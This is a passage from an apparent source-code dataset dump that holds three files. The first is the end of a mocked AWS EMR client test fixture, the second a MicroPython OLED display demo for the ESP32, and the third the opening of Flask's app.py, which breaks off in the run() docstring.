'StateChangeReason': {'Code': 'INTERNAL_ERROR',
'Message': 'Startup script failed.'},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9, 10),
'EndDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-035e6d6d63fd5b244'}]},
{'Id': 'ci-31W8Z97DPKISH',
'Ec2InstanceId': 'i-0f8a49595746000c6',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-181-246.ec2.internal',
'PrivateIpAddress': '11.225.181.246',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-024a827a0dfb1f020'}]},
{'Id': 'ci-LALR90A040LE',
'Ec2InstanceId': 'i-010785f4cc01291c6',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-182-177.ec2.internal',
'PrivateIpAddress': '11.225.182.177',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9, 10),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-0dfa83f26dba6d166'}]},
{'Id': 'ci-7EGA48KCGEPB',
'Ec2InstanceId': 'i-00165a7vv705de729',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-183-233.ec2.internal',
'PrivateIpAddress': '11.225.183.233',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-0fad27754481ed35f'}]},
{'Id': 'ci-2HFLSDMDWGQTO',
'Ec2InstanceId': 'i-0217e49225744ce71',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-180-81.ec2.internal',
'PrivateIpAddress': '11.225.180.81',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-00c62a333a2e2bbcf'}]},
{'Id': 'ci-26MIX2MMXOOY7',
'Ec2InstanceId': 'i-0938b90515b0b8adf',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-182-250.ec2.internal',
'PrivateIpAddress': '11.225.182.250',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {
'CreationDateTime': datetime(2017, 10, 9),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3FR4STYY3V56R',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-051e3cb1c47348904'}]},
{'Id': 'ci-29QIUQ3NYBVG6',
'Ec2InstanceId': 'i-011513d5f9721926b',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-181-179.ec2.internal',
'PrivateIpAddress': '11.225.181.179',
'Status': {'State': 'RUNNING',
'StateChangeReason': {},
'Timeline': {'CreationDateTime': datetime(2017, 10, 9),
'ReadyDateTime': datetime(2017, 10, 9)}},
'InstanceGroupId': 'ig-3CVLDUSAEVB33',
'Market': 'ON_DEMAND',
'InstanceType': 'm4.4xlarge',
'EbsVolumes': [{'Device': '/dev/sdb',
'VolumeId': 'vol-090f8c3caac1a9ca4'}]}]
}
emr_client = TestEmrClient()
return emr_client
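
# Hedged usage sketch (an assumption, not part of this module: it presumes
# pytest's monkeypatch fixture and code under test that builds its client
# via boto3.client('emr')):
#
#   def test_describe_cluster(monkeypatch):
#       import boto3
#       monkeypatch.setattr(boto3, 'client', mock_emr_client)
#       resp = boto3.client('emr').describe_cluster(ClusterId='s-SNGBtA88l')
#       assert resp['Cluster']['Status']['State'] == 'RUNNING'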
| [
"[email protected]"
] | |
10e96bc785ac19c2efd851c350ebe01d79ef24e4 | 7cc57bb8bf0f7219e2ed0b05fadc271a7b20bf0e | /DEVKITv1/oled/main.py | 39341702169b799949baca2e15570e1b7d4e837e | [] | no_license | cloudymike/micropythonexamples | 3bc03bccc1d3056f81e4d254b3f7a159648d85f1 | 953531451d89fb20ff81ceeef74d8bae6db3d4f3 | refs/heads/master | 2023-08-19T01:50:23.763464 | 2023-08-07T15:52:54 | 2023-08-07T15:52:54 | 200,582,793 | 0 | 2 | null | 2023-09-14T02:32:25 | 2019-08-05T04:35:00 | Python | UTF-8 | Python | false | false | 1,128 | py | # Complete project details at https://RandomNerdTutorials.com
from machine import Pin, I2C
import ssd1306
from time import sleep
import os
from time import sleep_ms
import gfx
import bignumber
# ESP32 Pin assignment
i2c = I2C(-1, scl=Pin(22), sda=Pin(21))
# ESP8266 Pin assignment
#i2c = I2C(-1, scl=Pin(5), sda=Pin(4))  # GPIO5/GPIO4 are the usual ESP8266 I2C pins
# Reset OLED
oledReset=Pin(16, Pin.OUT)
oledReset.value(0)
sleep_ms(500)
oledReset.value(1)
oled_width = 128
oled_height = 64
oled = ssd1306.SSD1306_I2C(oled_width, oled_height, i2c)
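# note: the ssd1306 driver defaults to I2C address 0x3C, the usual address
# for these 128x64 modules; pass addr=... to the constructor if yours differs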
oled.text('Hello, World 1!', 0, 0)
oled.text('Hello, World 2!', 0, 10)
oled.text('Hello, World 3!', 0, 20)
oled.show()
sleep_ms(1000)
oled.fill(0)
graphics = gfx.GFX(oled_width, oled_height, oled.pixel)
graphics.fill_circle(64, 16, 16, 1)
oled.show()
sleep_ms(1000)
oled.fill(1)
oled.show()
sleep_ms(1000)
for number in range(15):
oled.fill(0)
bignumber.bigNumber(oled, number)
oled.show()
sleep_ms(10)
oled.fill(0)
bignumber.bigTemp(oled, 14.6, 'F')
oled.show()
sleep_ms(1000)
oled.fill(0)
oled.text('The end!', 60, 49)
oled.show()
| [
"[email protected]"
] | |
530008283c1d95b2bbd68b84c9530f2593eceb96 | 5de718a2ab00460f59621e1e3c100b37c0853f61 | /env/Lib/site-packages/flask/app.py | b321c63f7c4bba6de67231bffec304fc04d9759d | [] | no_license | HenryVo31/Connect | 3fd60d893edd1199663878b7b68505e57a410dd6 | 3783e5b4d6b58f19e37ccff66501cb78c35c1500 | refs/heads/master | 2023-02-13T14:21:12.692446 | 2021-01-08T21:40:16 | 2021-01-08T21:40:16 | 295,485,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97,137 | py | # -*- coding: utf-8 -*-
"""
flask.app
~~~~~~~~~
This module implements the central WSGI application object.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import warnings
from datetime import timedelta
from functools import update_wrapper
from itertools import chain
from threading import Lock
from werkzeug.datastructures import Headers, ImmutableDict
from werkzeug.exceptions import BadRequest, BadRequestKeyError, HTTPException, \
InternalServerError, MethodNotAllowed, default_exceptions
from werkzeug.routing import BuildError, Map, RequestRedirect, \
RoutingException, Rule
from . import cli, json
from ._compat import integer_types, reraise, string_types, text_type
from .config import Config, ConfigAttribute
from .ctx import AppContext, RequestContext, _AppCtxGlobals
from .globals import _request_ctx_stack, g, request, session
from .helpers import (
_PackageBoundObject,
_endpoint_from_view_func, find_package, get_env, get_debug_flag,
get_flashed_messages, locked_cached_property, url_for, get_load_dotenv
)
from .logging import create_logger
from .sessions import SecureCookieSessionInterface
from .signals import appcontext_tearing_down, got_request_exception, \
request_finished, request_started, request_tearing_down
from .templating import DispatchingJinjaLoader, Environment, \
_default_template_ctx_processor
from .wrappers import Request, Response
# a singleton sentinel value for parameter defaults
_sentinel = object()
def _make_timedelta(value):
if not isinstance(value, timedelta):
return timedelta(seconds=value)
return value
def setupmethod(f):
"""Wraps a method so that it performs a check in debug mode if the
first request was already handled.
"""
def wrapper_func(self, *args, **kwargs):
if self.debug and self._got_first_request:
raise AssertionError('A setup function was called after the '
'first request was handled. This usually indicates a bug '
'in the application where a module was not imported '
'and decorators or other functionality was called too late.\n'
'To fix this make sure to import all your view modules, '
'database models and everything related at a central place '
'before the application starts serving requests.')
return f(self, *args, **kwargs)
return update_wrapper(wrapper_func, f)
class Flask(_PackageBoundObject):
"""The flask object implements a WSGI application and acts as the central
object. It is passed the name of the module or package of the
application. Once it is created it will act as a central registry for
the view functions, the URL rules, template configuration and much more.
The name of the package is used to resolve resources from inside the
package or the folder the module is contained in depending on if the
package parameter resolves to an actual python package (a folder with
an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file).
For more information about resource loading, see :func:`open_resource`.
Usually you create a :class:`Flask` instance in your main module or
in the :file:`__init__.py` file of your package like this::
from flask import Flask
app = Flask(__name__)
.. admonition:: About the First Parameter
The idea of the first parameter is to give Flask an idea of what
belongs to your application. This name is used to find resources
on the filesystem, can be used by extensions to improve debugging
information and a lot more.
So it's important what you provide there. If you are using a single
module, `__name__` is always the correct value. If you however are
using a package, it's usually recommended to hardcode the name of
your package there.
For example if your application is defined in :file:`yourapplication/app.py`
you should create it with one of the two versions below::
app = Flask('yourapplication')
app = Flask(__name__.split('.')[0])
Why is that? The application will work even with `__name__`, thanks
to how resources are looked up. However it will make debugging more
painful. Certain extensions can make assumptions based on the
import name of your application. For example the Flask-SQLAlchemy
extension will look for the code in your application that triggered
an SQL query in debug mode. If the import name is not properly set
up, that debugging information is lost. (For example it would only
pick up SQL queries in `yourapplication.app` and not
`yourapplication.views.frontend`)
.. versionadded:: 0.7
The `static_url_path`, `static_folder`, and `template_folder`
parameters were added.
.. versionadded:: 0.8
The `instance_path` and `instance_relative_config` parameters were
added.
.. versionadded:: 0.11
The `root_path` parameter was added.
.. versionadded:: 1.0
The ``host_matching`` and ``static_host`` parameters were added.
.. versionadded:: 1.0
The ``subdomain_matching`` parameter was added. Subdomain
matching needs to be enabled manually now. Setting
:data:`SERVER_NAME` does not implicitly enable it.
:param import_name: the name of the application package
:param static_url_path: can be used to specify a different path for the
static files on the web. Defaults to the name
of the `static_folder` folder.
:param static_folder: the folder with static files that should be served
at `static_url_path`. Defaults to the ``'static'``
folder in the root path of the application.
:param static_host: the host to use when adding the static route.
Defaults to None. Required when using ``host_matching=True``
with a ``static_folder`` configured.
:param host_matching: set ``url_map.host_matching`` attribute.
Defaults to False.
:param subdomain_matching: consider the subdomain relative to
:data:`SERVER_NAME` when matching routes. Defaults to False.
:param template_folder: the folder that contains the templates that should
be used by the application. Defaults to
``'templates'`` folder in the root path of the
application.
:param instance_path: An alternative instance path for the application.
By default the folder ``'instance'`` next to the
package or module is assumed to be the instance
path.
:param instance_relative_config: if set to ``True`` relative filenames
for loading the config are assumed to
be relative to the instance path instead
of the application root.
:param root_path: Flask by default will automatically calculate the path
to the root of the application. In certain situations
this cannot be achieved (for instance if the package
is a Python 3 namespace package) and needs to be
manually defined.
"""
#: The class that is used for request objects. See :class:`~flask.Request`
#: for more information.
request_class = Request
#: The class that is used for response objects. See
#: :class:`~flask.Response` for more information.
response_class = Response
#: The class that is used for the Jinja environment.
#:
#: .. versionadded:: 0.11
jinja_environment = Environment
#: The class that is used for the :data:`~flask.g` instance.
#:
#: Example use cases for a custom class:
#:
#: 1. Store arbitrary attributes on flask.g.
#: 2. Add a property for lazy per-request database connectors.
#: 3. Return None instead of AttributeError on unexpected attributes.
#: 4. Raise exception if an unexpected attr is set, a "controlled" flask.g.
#:
#: In Flask 0.9 this property was called `request_globals_class` but it
#: was changed in 0.10 to :attr:`app_ctx_globals_class` because the
#: flask.g object is now application context scoped.
#:
#: .. versionadded:: 0.10
app_ctx_globals_class = _AppCtxGlobals
#: The class that is used for the ``config`` attribute of this app.
#: Defaults to :class:`~flask.Config`.
#:
#: Example use cases for a custom class:
#:
#: 1. Default values for certain config options.
#: 2. Access to config values through attributes in addition to keys.
#:
#: .. versionadded:: 0.11
config_class = Config
#: The testing flag. Set this to ``True`` to enable the test mode of
#: Flask extensions (and in the future probably also Flask itself).
#: For example this might activate test helpers that have an
#: additional runtime cost which should not be enabled by default.
#:
#: If this is enabled and PROPAGATE_EXCEPTIONS is not changed from the
#: default it's implicitly enabled.
#:
#: This attribute can also be configured from the config with the
#: ``TESTING`` configuration key. Defaults to ``False``.
testing = ConfigAttribute('TESTING')
#: If a secret key is set, cryptographic components can use this to
#: sign cookies and other things. Set this to a complex random value
#: when you want to use the secure cookie for instance.
#:
#: This attribute can also be configured from the config with the
#: :data:`SECRET_KEY` configuration key. Defaults to ``None``.
secret_key = ConfigAttribute('SECRET_KEY')
#: The secure cookie uses this for the name of the session cookie.
#:
#: This attribute can also be configured from the config with the
#: ``SESSION_COOKIE_NAME`` configuration key. Defaults to ``'session'``
session_cookie_name = ConfigAttribute('SESSION_COOKIE_NAME')
#: A :class:`~datetime.timedelta` which is used to set the expiration
#: date of a permanent session. The default is 31 days which makes a
#: permanent session survive for roughly one month.
#:
#: This attribute can also be configured from the config with the
#: ``PERMANENT_SESSION_LIFETIME`` configuration key. Defaults to
#: ``timedelta(days=31)``
permanent_session_lifetime = ConfigAttribute('PERMANENT_SESSION_LIFETIME',
get_converter=_make_timedelta)
#: A :class:`~datetime.timedelta` which is used as default cache_timeout
#: for the :func:`send_file` functions. The default is 12 hours.
#:
#: This attribute can also be configured from the config with the
#: ``SEND_FILE_MAX_AGE_DEFAULT`` configuration key. This configuration
#: variable can also be set with an integer value used as seconds.
#: Defaults to ``timedelta(hours=12)``
send_file_max_age_default = ConfigAttribute('SEND_FILE_MAX_AGE_DEFAULT',
get_converter=_make_timedelta)
#: Enable this if you want to use the X-Sendfile feature. Keep in
#: mind that the server has to support this. This only affects files
#: sent with the :func:`send_file` method.
#:
#: .. versionadded:: 0.2
#:
#: This attribute can also be configured from the config with the
#: ``USE_X_SENDFILE`` configuration key. Defaults to ``False``.
use_x_sendfile = ConfigAttribute('USE_X_SENDFILE')
#: The JSON encoder class to use. Defaults to :class:`~flask.json.JSONEncoder`.
#:
#: .. versionadded:: 0.10
json_encoder = json.JSONEncoder
#: The JSON decoder class to use. Defaults to :class:`~flask.json.JSONDecoder`.
#:
#: .. versionadded:: 0.10
json_decoder = json.JSONDecoder
#: Options that are passed directly to the Jinja2 environment.
jinja_options = ImmutableDict(
extensions=['jinja2.ext.autoescape', 'jinja2.ext.with_']
)
#: Default configuration parameters.
default_config = ImmutableDict({
'ENV': None,
'DEBUG': None,
'TESTING': False,
'PROPAGATE_EXCEPTIONS': None,
'PRESERVE_CONTEXT_ON_EXCEPTION': None,
'SECRET_KEY': None,
'PERMANENT_SESSION_LIFETIME': timedelta(days=31),
'USE_X_SENDFILE': False,
'SERVER_NAME': None,
'APPLICATION_ROOT': '/',
'SESSION_COOKIE_NAME': 'session',
'SESSION_COOKIE_DOMAIN': None,
'SESSION_COOKIE_PATH': None,
'SESSION_COOKIE_HTTPONLY': True,
'SESSION_COOKIE_SECURE': False,
'SESSION_COOKIE_SAMESITE': None,
'SESSION_REFRESH_EACH_REQUEST': True,
'MAX_CONTENT_LENGTH': None,
'SEND_FILE_MAX_AGE_DEFAULT': timedelta(hours=12),
'TRAP_BAD_REQUEST_ERRORS': None,
'TRAP_HTTP_EXCEPTIONS': False,
'EXPLAIN_TEMPLATE_LOADING': False,
'PREFERRED_URL_SCHEME': 'http',
'JSON_AS_ASCII': True,
'JSON_SORT_KEYS': True,
'JSONIFY_PRETTYPRINT_REGULAR': False,
'JSONIFY_MIMETYPE': 'application/json',
'TEMPLATES_AUTO_RELOAD': None,
'MAX_COOKIE_SIZE': 4093,
})
#: The rule object to use for URL rules created. This is used by
#: :meth:`add_url_rule`. Defaults to :class:`werkzeug.routing.Rule`.
#:
#: .. versionadded:: 0.7
url_rule_class = Rule
#: the test client that is used with when `test_client` is used.
#:
#: .. versionadded:: 0.7
test_client_class = None
#: The :class:`~click.testing.CliRunner` subclass, by default
#: :class:`~flask.testing.FlaskCliRunner` that is used by
#: :meth:`test_cli_runner`. Its ``__init__`` method should take a
#: Flask app object as the first argument.
#:
#: .. versionadded:: 1.0
test_cli_runner_class = None
#: the session interface to use. By default an instance of
#: :class:`~flask.sessions.SecureCookieSessionInterface` is used here.
#:
#: .. versionadded:: 0.8
session_interface = SecureCookieSessionInterface()
# TODO remove the next three attrs when Sphinx :inherited-members: works
# https://github.com/sphinx-doc/sphinx/issues/741
#: The name of the package or module that this app belongs to. Do not
#: change this once it is set by the constructor.
import_name = None
#: Location of the template files to be added to the template lookup.
#: ``None`` if templates should not be added.
template_folder = None
#: Absolute path to the package on the filesystem. Used to look up
#: resources contained in the package.
root_path = None
def __init__(
self,
import_name,
static_url_path=None,
static_folder='static',
static_host=None,
host_matching=False,
subdomain_matching=False,
template_folder='templates',
instance_path=None,
instance_relative_config=False,
root_path=None
):
_PackageBoundObject.__init__(
self,
import_name,
template_folder=template_folder,
root_path=root_path
)
if static_url_path is not None:
self.static_url_path = static_url_path
if static_folder is not None:
self.static_folder = static_folder
if instance_path is None:
instance_path = self.auto_find_instance_path()
elif not os.path.isabs(instance_path):
raise ValueError(
'If an instance path is provided it must be absolute.'
' A relative path was given instead.'
)
#: Holds the path to the instance folder.
#:
#: .. versionadded:: 0.8
self.instance_path = instance_path
#: The configuration dictionary as :class:`Config`. This behaves
#: exactly like a regular dictionary but supports additional methods
#: to load a config from files.
self.config = self.make_config(instance_relative_config)
#: A dictionary of all view functions registered. The keys will
#: be function names which are also used to generate URLs and
#: the values are the function objects themselves.
#: To register a view function, use the :meth:`route` decorator.
self.view_functions = {}
#: A dictionary of all registered error handlers. The key is ``None``
#: for error handlers active on the application, otherwise the key is
#: the name of the blueprint. Each key points to another dictionary
#: where the key is the status code of the http exception. The
#: special key ``None`` points to a list of tuples where the first item
#: is the class for the instance check and the second the error handler
#: function.
#:
#: To register an error handler, use the :meth:`errorhandler`
#: decorator.
self.error_handler_spec = {}
#: A list of functions that are called when :meth:`url_for` raises a
#: :exc:`~werkzeug.routing.BuildError`. Each function registered here
#: is called with `error`, `endpoint` and `values`. If a function
#: returns ``None`` or raises a :exc:`BuildError` the next function is
#: tried.
#:
#: .. versionadded:: 0.9
self.url_build_error_handlers = []
#: A dictionary with lists of functions that will be called at the
#: beginning of each request. The key of the dictionary is the name of
#: the blueprint this function is active for, or ``None`` for all
#: requests. To register a function, use the :meth:`before_request`
#: decorator.
self.before_request_funcs = {}
#: A list of functions that will be called at the beginning of the
#: first request to this instance. To register a function, use the
#: :meth:`before_first_request` decorator.
#:
#: .. versionadded:: 0.8
self.before_first_request_funcs = []
#: A dictionary with lists of functions that should be called after
#: each request. The key of the dictionary is the name of the blueprint
#: this function is active for, ``None`` for all requests. This can for
#: example be used to close database connections. To register a function
#: here, use the :meth:`after_request` decorator.
self.after_request_funcs = {}
#: A dictionary with lists of functions that are called after
#: each request, even if an exception has occurred. The key of the
#: dictionary is the name of the blueprint this function is active for,
#: ``None`` for all requests. These functions are not allowed to modify
#: the request, and their return values are ignored. If an exception
#: occurred while processing the request, it gets passed to each
#: teardown_request function. To register a function here, use the
#: :meth:`teardown_request` decorator.
#:
#: .. versionadded:: 0.7
self.teardown_request_funcs = {}
#: A list of functions that are called when the application context
#: is destroyed. Since the application context is also torn down
#: if the request ends this is the place to store code that disconnects
#: from databases.
#:
#: .. versionadded:: 0.9
self.teardown_appcontext_funcs = []
#: A dictionary with lists of functions that are called before the
#: :attr:`before_request_funcs` functions. The key of the dictionary is
#: the name of the blueprint this function is active for, or ``None``
#: for all requests. To register a function, use
#: :meth:`url_value_preprocessor`.
#:
#: .. versionadded:: 0.7
self.url_value_preprocessors = {}
#: A dictionary with lists of functions that can be used as URL value
#: preprocessors. The key ``None`` here is used for application wide
#: callbacks, otherwise the key is the name of the blueprint.
#: Each of these functions has the chance to modify the dictionary
#: of URL values before they are used as the keyword arguments of the
#: view function. For each function registered this one should also
#: provide a :meth:`url_defaults` function that adds the parameters
#: automatically again that were removed that way.
#:
#: .. versionadded:: 0.7
self.url_default_functions = {}
#: A dictionary with list of functions that are called without argument
#: to populate the template context. The key of the dictionary is the
#: name of the blueprint this function is active for, ``None`` for all
#: requests. Each returns a dictionary that the template context is
#: updated with. To register a function here, use the
#: :meth:`context_processor` decorator.
self.template_context_processors = {
None: [_default_template_ctx_processor]
}
#: A list of shell context processor functions that should be run
#: when a shell context is created.
#:
#: .. versionadded:: 0.11
self.shell_context_processors = []
#: all the attached blueprints in a dictionary by name. Blueprints
#: can be attached multiple times so this dictionary does not tell
#: you how often they got attached.
#:
#: .. versionadded:: 0.7
self.blueprints = {}
self._blueprint_order = []
#: a place where extensions can store application specific state. For
#: example this is where an extension could store database engines and
#: similar things. For backwards compatibility extensions should register
#: themselves like this::
#:
#: if not hasattr(app, 'extensions'):
#: app.extensions = {}
#: app.extensions['extensionname'] = SomeObject()
#:
#: The key must match the name of the extension module. For example in
#: case of a "Flask-Foo" extension in `flask_foo`, the key would be
#: ``'foo'``.
#:
#: .. versionadded:: 0.7
self.extensions = {}
#: The :class:`~werkzeug.routing.Map` for this instance. You can use
#: this to change the routing converters after the class was created
#: but before any routes are connected. Example::
#:
#: from werkzeug.routing import BaseConverter
#:
#: class ListConverter(BaseConverter):
#: def to_python(self, value):
#: return value.split(',')
#: def to_url(self, values):
#: return ','.join(super(ListConverter, self).to_url(value)
#: for value in values)
#:
#: app = Flask(__name__)
#: app.url_map.converters['list'] = ListConverter
self.url_map = Map()
self.url_map.host_matching = host_matching
self.subdomain_matching = subdomain_matching
# tracks internally if the application already handled at least one
# request.
self._got_first_request = False
self._before_request_lock = Lock()
# Add a static route using the provided static_url_path, static_host,
# and static_folder if there is a configured static_folder.
# Note we do this without checking if static_folder exists.
# For one, it might be created while the server is running (e.g. during
# development). Also, Google App Engine stores static files somewhere
if self.has_static_folder:
assert bool(static_host) == host_matching, 'Invalid static_host/host_matching combination'
self.add_url_rule(
self.static_url_path + '/<path:filename>',
endpoint='static',
host=static_host,
view_func=self.send_static_file
)
#: The click command line context for this application. Commands
#: registered here show up in the :command:`flask` command once the
#: application has been discovered. The default commands are
#: provided by Flask itself and can be overridden.
#:
#: This is an instance of a :class:`click.Group` object.
self.cli = cli.AppGroup(self.name)
@locked_cached_property
def name(self):
"""The name of the application. This is usually the import name
with the difference that it's guessed from the run file if the
import name is main. This name is used as a display name when
Flask needs the name of the application. It can be set and overridden
to change the value.
.. versionadded:: 0.8
"""
if self.import_name == '__main__':
fn = getattr(sys.modules['__main__'], '__file__', None)
if fn is None:
return '__main__'
return os.path.splitext(os.path.basename(fn))[0]
return self.import_name
@property
def propagate_exceptions(self):
"""Returns the value of the ``PROPAGATE_EXCEPTIONS`` configuration
value in case it's set, otherwise a sensible default is returned.
.. versionadded:: 0.7
"""
rv = self.config['PROPAGATE_EXCEPTIONS']
if rv is not None:
return rv
return self.testing or self.debug
@property
def preserve_context_on_exception(self):
"""Returns the value of the ``PRESERVE_CONTEXT_ON_EXCEPTION``
configuration value in case it's set, otherwise a sensible default
is returned.
.. versionadded:: 0.7
"""
rv = self.config['PRESERVE_CONTEXT_ON_EXCEPTION']
if rv is not None:
return rv
return self.debug
@locked_cached_property
def logger(self):
"""The ``'flask.app'`` logger, a standard Python
:class:`~logging.Logger`.
In debug mode, the logger's :attr:`~logging.Logger.level` will be set
to :data:`~logging.DEBUG`.
If there are no handlers configured, a default handler will be added.
See :ref:`logging` for more information.
.. versionchanged:: 1.0
Behavior was simplified. The logger is always named
``flask.app``. The level is only set during configuration, it
doesn't check ``app.debug`` each time. Only one format is used,
not different ones depending on ``app.debug``. No handlers are
removed, and a handler is only added if no handlers are already
configured.
.. versionadded:: 0.3
"""
return create_logger(self)
@locked_cached_property
def jinja_env(self):
"""The Jinja2 environment used to load templates."""
return self.create_jinja_environment()
@property
def got_first_request(self):
"""This attribute is set to ``True`` if the application started
handling the first request.
.. versionadded:: 0.8
"""
return self._got_first_request
def make_config(self, instance_relative=False):
"""Used to create the config attribute by the Flask constructor.
The `instance_relative` parameter is passed in from the constructor
of Flask (there named `instance_relative_config`) and indicates if
the config should be relative to the instance path or the root path
of the application.
.. versionadded:: 0.8
"""
root_path = self.root_path
if instance_relative:
root_path = self.instance_path
defaults = dict(self.default_config)
defaults['ENV'] = get_env()
defaults['DEBUG'] = get_debug_flag()
return self.config_class(root_path, defaults)
def auto_find_instance_path(self):
"""Tries to locate the instance path if it was not provided to the
constructor of the application class. It will basically calculate
the path to a folder named ``instance`` next to your main file or
the package.
.. versionadded:: 0.8
"""
prefix, package_path = find_package(self.import_name)
if prefix is None:
return os.path.join(package_path, 'instance')
return os.path.join(prefix, 'var', self.name + '-instance')
def open_instance_resource(self, resource, mode='rb'):
"""Opens a resource from the application's instance folder
(:attr:`instance_path`). Otherwise works like
:meth:`open_resource`. Instance resources can also be opened for
writing.
:param resource: the name of the resource. To access resources within
subfolders use forward slashes as separator.
:param mode: resource file opening mode, default is 'rb'.
"""
return open(os.path.join(self.instance_path, resource), mode)
def _get_templates_auto_reload(self):
"""Reload templates when they are changed. Used by
:meth:`create_jinja_environment`.
This attribute can be configured with :data:`TEMPLATES_AUTO_RELOAD`. If
not set, it will be enabled in debug mode.
.. versionadded:: 1.0
This property was added but the underlying config and behavior
already existed.
"""
rv = self.config['TEMPLATES_AUTO_RELOAD']
return rv if rv is not None else self.debug
def _set_templates_auto_reload(self, value):
self.config['TEMPLATES_AUTO_RELOAD'] = value
templates_auto_reload = property(
_get_templates_auto_reload, _set_templates_auto_reload
)
del _get_templates_auto_reload, _set_templates_auto_reload
def create_jinja_environment(self):
"""Creates the Jinja2 environment based on :attr:`jinja_options`
and :meth:`select_jinja_autoescape`. Since 0.7 this also adds
the Jinja2 globals and filters after initialization. Override
this function to customize the behavior.
.. versionadded:: 0.5
.. versionchanged:: 0.11
``Environment.auto_reload`` set in accordance with
``TEMPLATES_AUTO_RELOAD`` configuration option.
"""
options = dict(self.jinja_options)
if 'autoescape' not in options:
options['autoescape'] = self.select_jinja_autoescape
if 'auto_reload' not in options:
options['auto_reload'] = self.templates_auto_reload
rv = self.jinja_environment(self, **options)
rv.globals.update(
url_for=url_for,
get_flashed_messages=get_flashed_messages,
config=self.config,
# request, session and g are normally added with the
# context processor for efficiency reasons but for imported
# templates we also want the proxies in there.
request=request,
session=session,
g=g
)
rv.filters['tojson'] = json.tojson_filter
return rv
def create_global_jinja_loader(self):
"""Creates the loader for the Jinja2 environment. Can be used to
override just the loader and keeping the rest unchanged. It's
discouraged to override this function. Instead one should override
the :meth:`jinja_loader` function instead.
The global loader dispatches between the loaders of the application
and the individual blueprints.
.. versionadded:: 0.7
"""
return DispatchingJinjaLoader(self)
def select_jinja_autoescape(self, filename):
"""Returns ``True`` if autoescaping should be active for the given
template name. If no template name is given, returns `True`.
.. versionadded:: 0.5
"""
if filename is None:
return True
return filename.endswith(('.html', '.htm', '.xml', '.xhtml'))
def update_template_context(self, context):
"""Update the template context with some commonly used variables.
This injects request, session, config and g into the template
context as well as everything template context processors want
to inject. Note that the as of Flask 0.6, the original values
in the context will not be overridden if a context processor
decides to return a value with the same key.
:param context: the context as a dictionary that is updated in place
to add extra variables.
"""
funcs = self.template_context_processors[None]
reqctx = _request_ctx_stack.top
if reqctx is not None:
bp = reqctx.request.blueprint
if bp is not None and bp in self.template_context_processors:
funcs = chain(funcs, self.template_context_processors[bp])
orig_ctx = context.copy()
for func in funcs:
context.update(func())
# make sure the original values win. This makes it possible to
# easier add new variables in context processors without breaking
# existing views.
context.update(orig_ctx)
def make_shell_context(self):
"""Returns the shell context for an interactive shell for this
application. This runs all the registered shell context
processors.
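
        By default the context contains ``app`` and ``g``.  Functions
        registered with :meth:`shell_context_processor` extend it, for
        example (``db`` below stands in for any object you want preloaded;
        it is illustrative, not defined here)::

            @app.shell_context_processor
            def make_shell_ctx():
                return {'db': db}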
.. versionadded:: 0.11
"""
rv = {'app': self, 'g': g}
for processor in self.shell_context_processors:
rv.update(processor())
return rv
#: What environment the app is running in. Flask and extensions may
#: enable behaviors based on the environment, such as enabling debug
#: mode. This maps to the :data:`ENV` config key. This is set by the
#: :envvar:`FLASK_ENV` environment variable and may not behave as
#: expected if set in code.
#:
#: **Do not enable development when deploying in production.**
#:
#: Default: ``'production'``
env = ConfigAttribute('ENV')
def _get_debug(self):
return self.config['DEBUG']
def _set_debug(self, value):
self.config['DEBUG'] = value
self.jinja_env.auto_reload = self.templates_auto_reload
#: Whether debug mode is enabled. When using ``flask run`` to start
#: the development server, an interactive debugger will be shown for
#: unhandled exceptions, and the server will be reloaded when code
#: changes. This maps to the :data:`DEBUG` config key. This is
#: enabled when :attr:`env` is ``'development'`` and is overridden
#: by the ``FLASK_DEBUG`` environment variable. It may not behave as
#: expected if set in code.
#:
#: **Do not enable debug mode when deploying in production.**
#:
#: Default: ``True`` if :attr:`env` is ``'development'``, or
#: ``False`` otherwise.
debug = property(_get_debug, _set_debug)
del _get_debug, _set_debug
def run(self, host=None, port=None, debug=None,
load_dotenv=True, **options):
"""Runs the application on a local development server.
Do not use ``run()`` in a production setting. It is not intended to
meet security and performance requirements for a production server.
